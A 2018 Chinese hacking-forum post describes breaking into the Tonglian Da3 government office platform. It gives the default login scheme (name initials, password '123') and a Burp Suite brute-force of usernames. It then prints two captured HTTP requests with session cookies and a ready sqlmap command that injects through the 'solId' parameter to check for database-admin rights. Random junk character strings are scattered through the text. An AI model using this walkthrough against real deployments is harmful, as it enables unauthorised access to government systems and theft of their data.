找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1348|回复: 0
打印 上一主题 下一主题

同联Da3协同办公平台前台通用sql injection漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:15:17 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

4 v; G) J9 u$ v. `7 y) V. U; I h
G9 K0 P( Y% \+ y

8 U" l$ k& Q6 D1 R/ n

' Y; T6 ?2 q" x2 u( D4 Z( {. g 平台简介: }( \9 O# V, X4 I _# L" w2 z, n

9 @; H/ V/ ~* l9 ]7 r

" q8 n3 n: O# S' I* w, |! U   6 ^8 q$ o& ]- m' b( C

( ~2 ^3 r' ?) D F3 }5 M

8 y) _# e4 n* I6 H# K. F 北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
( @) X5 w4 b1 d 同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
F3 ~8 I8 S8 l# `) U# x' Z 同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!, g! S4 b# ]8 f2 ~' _

8 W% E" n+ i7 s, T& W

, J6 C; h+ r2 b  , O2 m x9 y$ o' @& V* f/ u5 D

/ ^) n1 q0 A; t) v5 Q; ^1 I

0 I7 Y' U! y; _* n+ U 由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:3 _' S+ S- d4 ^& ^3 r

; ^8 X& X* @' e! K) N2 E" @3 k# v% V

3 s H* {: Y; X% L/ L8 ?  : X& ~+ U# H) w0 c

; M' v- f V$ H* D7 l1 H: S' _5 h

) j: N9 i1 A. @# ~$ z- V8 x6 v http://1.1.1.1:7197/cap-aco/#(案例2-) + d# g9 Z3 R: Y/ H# i

: s0 F7 r$ B5 c9 Q, e

2 O6 c; B. s8 a8 t7 |5 K/ f http://www.XXOO.com (案例1-官网网站) # {( y( l1 _; B* k5 ]

/ y8 b5 I/ t! y' F7 \

) D% k# |" S5 B1 H, k5 z   % o. H) h- _" e9 V3 z

7 Y; a6 Z8 i/ Z. P

; t5 h0 f6 d2 I) s+ `. P 漏洞详情:* D4 |4 d# a. r- E5 V3 Q

; f7 O( l( W# R6 l, h

% Q! D2 ?) Z O- V; y  初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试 3 W8 f/ o7 M" { V/ R/ P

9 ]' t5 y# Z$ q8 _9 e- b7 D( S/ _

! v6 s+ U& w* j' w9 \      首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图: " T* e% [* K' I4 o2 P+ q m( t

6 _/ S, E2 X! V+ T- @! L% }5 d8 x7 g

- a/ P# E _6 |! \3 X- w3 U  - X5 ]7 \' ^" ?4 e- p3 Q

, o" @0 i9 ? ?- ] ~

3 k: v) K5 u- X1 Q% i) r   $ O5 t4 v! S& P0 S

, m2 g: w; l: m5 U% @, Q

4 V$ O6 Q& {* D& z/ S status为302即表示破解成功,然后找个破解成功的账号登录系统。经过长时间的手工测试发现在发文管理模块抓包,抓包的数据分别如下:$ D b4 Z! V% ~; T$ I9 T. {, [

$ l" Q; ^* s9 W7 G* i1 {$ k

, ^- k5 ~/ w6 K4 H) G) |- ~" n 1、案例1-官方网站 / U, C& B* Q* {1 S V

1 y. D3 e( H. ^8 o O) ?

7 W7 |- d" H2 w' M! r0 B+ q GET /bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=42b0234e-d5dc-402d-9cef-1ce38cbae480&state=&title=1111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510060789826 HTTP/1.1 / `7 L4 J" w8 a+ Q8 o+ Q

* t I' N+ I* t8 L& O

6 ]) @! ]; s2 y9 D Host: www.XXOO.com : w' P( Y: d1 R" A9 }& X) i6 X0 p

4 s% W1 E- ?! \" A" a2 X6 R$ H

1 M: @; S. y- u7 h+ Y' r/ V0 h Proxy-Connection: Keep-Alive " i* l' ?4 z+ m

/ X- [. M# r. J

0 j3 {& \+ g R" ` Accept: application/json, text/javascript, */*; q=0.01 * }# d3 |7 O1 _% b" W) V# b

+ m. m$ t& h5 n n. s k" `* ~( w

1 M; k2 v* P; D0 Z: B& [' Z Accept-Language: zh-CN 6 b' U2 w' z/ @, o

, B7 g2 \$ N4 G) e( ~- t4 a2 o3 L

1 W1 x2 ~, c& X! A Content-Type: application/json ) w" j" o3 \5 @5 I6 l

! m$ P+ p3 _( d8 y

p' l& c3 C. Y, Y' }- A N9 c User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0; SE 2.X MetaSr 1.0) like Gecko - @& p5 a8 M# {; A5 \, i' |

6 u& Z K H+ V3 W) n& `- z2 n9 d

4 ?8 O5 h* a% q% ~* F8 M X-Requested-With: XMLHttpRequest + F" M) |% V+ j$ J( K

6 f" h. ~7 {% V* v& n4 h

/ w2 J& F* Z0 @: g7 T4 B Referer: http://www.XXOO.com/bizRunContro ... 80?modCode=1008M002 , h- T+ a9 l. U3 n7 A

$ v3 m+ Y' q. p: j

. T; K- M# K1 \2 x c Accept-Encoding: gzip, deflate, sdch7 _, E- V2 b& M/ i) I7 x

, [7 y+ g( t9 W5 p1 H x! W! Q7 X

1 h" ? s# C9 R- f Cookie: username=chm; password=123; rememberme=1; autoSubmit=1; sid=2cf5142f-6c1e-4cbb-89d8-2ebd08438b2e & L" ~. G; j% y& F% R- }

% C0 |! [8 v& K: v# v( Y8 m

. D8 |) L8 E' C, i' i 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r tl.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图: & R+ d- @% J# X# _7 f- f

- K6 [- Q# _0 V0 z9 J, q

6 ~1 y6 }, a( L( K  # W3 p' Y8 ?! L% b! k" o" M" R7 T$ s! S

2 Q( W1 t- E4 ^! v5 Z

O; Q& r7 W7 |% N! F2 B+ M* U0 d   " R/ j4 `1 O9 S3 q6 [0 B' l2 S

/ u4 Y$ s1 u; ]' l3 ^% c8 H

R3 ?. f- c' G; x( E/ ]/ N# T   9 `( B' r+ L5 h- w' P+ A

$ W1 e, z/ G+ K

2 x5 ]* F: d' c/ a2 c  . _5 t1 W3 f" k1 I! [5 E2 d9 ]1 j% ?- [

$ j# N2 V! j1 q+ t1 `/ z

& n/ B' ^2 j H3 b  ( i% N) O- o6 x, V9 b

9 a: C' @% g) f) B

' |. R; a' S6 k 2、案例2-某天河云平台" N. Y6 E. F6 \2 o# M8 P% c: I

; x/ Q; c3 l; c4 w6 v% J X

) h( E. y* A" p H GET /cap-aco/bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=af056885-4ae5-4e0b-8a0d-c413a786f2db&state=&title=11111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510047738662 HTTP/1.1 ! c/ e Y8 R3 I" m% C9 |

3 `2 _- A5 {' }3 ]$ K

% g1 Y# U4 G1 i% `+ `+ @ Host: 1.1.1.:7197- O8 c. D w& z

) U5 q: C( I. {# a; Q; m7 o2 ?; ?+ }

8 p, n3 k$ j' S7 P" P/ Z& {. M: W% F Accept: application/json, text/javascript, */*; q=0.01 ( Q; j6 }% B8 A+ Z+ {# y

$ m9 `4 j1 ? R4 b" a( O: Z

. W8 ^& ~: L+ t, q) Y8 F X-Requested-With: XMLHttpRequest - x" F, M$ F5 v. B

* A0 E7 S8 ?: S0 b4 J2 }' N

# `( g/ H, F- c+ F/ M y User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0 5 w4 p6 i+ T/ S9 s9 x8 R% F

; `0 J! u; Q6 _6 v' n

0 x3 x+ K2 A0 q" W8 S Content-Type: application/json, \7 w# a/ h1 {0 l4 s

' }" h) q# h& U4 l8 ~, y, F: @

( l& D& Q6 C1 l. ?. e- s& \ Referer: http://1.1.1.1:7197/cap-aco/bizR ... 86f2db?modCode=1008 3 t4 I4 ]8 B3 z8 W# |/ u3 S

8 x7 e+ s" p) P0 Q

' A+ i# H# A! U3 k Accept-Language: zh-CN,zh;q=0.83 p: u& X+ G% O8 F2 G! U- n5 s0 S- C

9 b; d& n! R) P* D; w/ _. H! l

* H7 |, J- J6 E1 ~5 A0 z3 @ Cookie: autoSubmit=1; sid=4e333ec9-d194-456b-bb08-4ff64c6eb1fc; username=lxr; password=123; rememberme=1; autoSubmit=1 9 [7 Y8 \- d$ v `4 a, \! \) c

7 {8 {- v. w6 c, Q$ A

, i+ S. V9 `3 J5 }2 u! C; B) T" o! O Connection: close0 d7 a/ G2 ^8 E9 y

: h" a4 m6 W3 }+ R7 a" X2 [

5 z4 v7 ]9 f2 h/ C% h 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r 1.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图: 8 \( j$ B8 ]3 u2 b

/ f$ u, _! N' W( X" F: I

. {5 Q `; x" `3 M4 k% E% @   1 A, D# I& e: k! N! l

: y. x: t! _5 h2 C, n) \& l

p* w. g, K: h
9 T8 }/ m: Z9 }

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表